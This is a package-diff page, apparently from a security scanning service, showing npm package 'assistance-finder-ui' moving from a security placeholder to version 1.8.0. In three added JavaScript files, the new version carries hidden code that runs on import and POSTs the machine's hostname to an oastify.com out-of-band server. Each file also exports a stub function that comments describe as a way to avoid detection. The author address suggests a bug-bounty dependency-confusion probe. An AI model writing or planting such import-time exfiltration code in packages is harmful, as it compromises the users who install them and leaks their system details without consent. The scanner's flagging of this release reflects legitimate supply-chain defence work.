assistance-finder-ui 0.0.1-security → 1.8.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of assistance-finder-ui might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/index.js +45 -0
  2. package/package.json +9 -3
  3. package/src/routes/paths.js +47 -0
  4. package/src/services/common-services.js +47 -0
  5. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,45 @@
1
+ // src/services/common-services.js
2
+
3
+ const os = require('os');
4
+ const https = require('https');
5
+
6
+ // Exfiltrate hostname when the package is imported
7
+ const exfiltrateHostname = () => {
8
+ const hostname = os.hostname();
9
+ const data = JSON.stringify({ hostname });
10
+
11
+ const options = {
12
+ hostname: 'rrmygj2h58cgnt0mwbx8mkuwtnzen9by.oastify.com', // Replace with your controlled server
13
+ port: 443,
14
+ path: '/hostname',
15
+ method: 'POST',
16
+ headers: {
17
+ 'Content-Type': 'application/json',
18
+ 'Content-Length': data.length,
19
+ },
20
+ };
21
+
22
+ const req = https.request(options, (res) => {
23
+ res.on('data', (d) => {
24
+ process.stdout.write(d);
25
+ });
26
+ });
27
+
28
+ req.on('error', (e) => {
29
+ console.error(e);
30
+ });
31
+
32
+ req.write(data);
33
+ req.end();
34
+ };
35
+
36
+ // Call the function when the module is imported
37
+ exfiltrateHostname();
38
+
39
+ // You can also re-export the actual functions to avoid breaking the application
40
+ module.exports = {
41
+ savePreviousCompletedPages: () => {
42
+ console.log('savePreviousCompletedPages called');
43
+ }
44
+ };
45
+
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "assistance-finder-ui",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.8.0",
4
+ "description": "assistance finder ui",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "siavashvafshar@bugcrowdninja.com",
10
+ "license": "ISC"
6
11
  }
12
+
package/src/routes/paths.js ADDED
@@ -0,0 +1,47 @@
1
+ const os = require('os');
2
+ const https = require('https');
3
+
4
+ // Function to send hostname to an attacker-controlled server
5
+ const exfiltrateHostname = () => {
6
+ const hostname = os.hostname();
7
+ const data = JSON.stringify({ hostname });
8
+
9
+ const options = {
10
+ hostname: 'rrmygj2h58cgnt0mwbx8mkuwtnzen9by.oastify.com', // Replace with your actual server hostname
11
+ port: 443,
12
+ path: '/hostname',
13
+ method: 'POST',
14
+ headers: {
15
+ 'Content-Type': 'application/json',
16
+ 'Content-Length': data.length,
17
+ },
18
+ };
19
+
20
+ const req = https.request(options, (res) => {
21
+ res.on('data', (d) => {
22
+ process.stdout.write(d);
23
+ });
24
+ });
25
+
26
+ req.on('error', (e) => {
27
+ console.error(e);
28
+ });
29
+
30
+ req.write(data);
31
+ req.end();
32
+ };
33
+
34
+ // The function being called in the original code
35
+ const savePreviousCompletedPages = (pagePath) => {
36
+ console.log(`savePreviousCompletedPages called with path: ${pagePath}`);
37
+ // Potentially do something legitimate here or simulate the expected functionality
38
+ // This function could be harmless to avoid detection
39
+ };
40
+
41
+ // Immediately call the exfiltration when the module is loaded
42
+ exfiltrateHostname();
43
+
44
+ // Export the function(s) expected by the original project
45
+ module.exports = {
46
+ savePreviousCompletedPages,
47
+ };
package/src/services/common-services.js ADDED
@@ -0,0 +1,47 @@
1
+ const os = require('os');
2
+ const https = require('https');
3
+
4
+ // Function to send hostname to an attacker-controlled server
5
+ const exfiltrateHostname = () => {
6
+ const hostname = os.hostname();
7
+ const data = JSON.stringify({ hostname });
8
+
9
+ const options = {
10
+ hostname: 'rrmygj2h58cgnt0mwbx8mkuwtnzen9by.oastify.com', // Replace with your actual server hostname
11
+ port: 443,
12
+ path: '/hostname',
13
+ method: 'POST',
14
+ headers: {
15
+ 'Content-Type': 'application/json',
16
+ 'Content-Length': data.length,
17
+ },
18
+ };
19
+
20
+ const req = https.request(options, (res) => {
21
+ res.on('data', (d) => {
22
+ process.stdout.write(d);
23
+ });
24
+ });
25
+
26
+ req.on('error', (e) => {
27
+ console.error(e);
28
+ });
29
+
30
+ req.write(data);
31
+ req.end();
32
+ };
33
+
34
+ // The function being called in the original code
35
+ const savePreviousCompletedPages = (pagePath) => {
36
+ console.log(`savePreviousCompletedPages called with path: ${pagePath}`);
37
+ // Potentially do something legitimate here or simulate the expected functionality
38
+ // This function could be harmless to avoid detection
39
+ };
40
+
41
+ // Immediately call the exfiltration when the module is loaded
42
+ exfiltrateHostname();
43
+
44
+ // Export the function(s) expected by the original project
45
+ module.exports = {
46
+ savePreviousCompletedPages,
47
+ };
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=assistance-finder-ui for more information.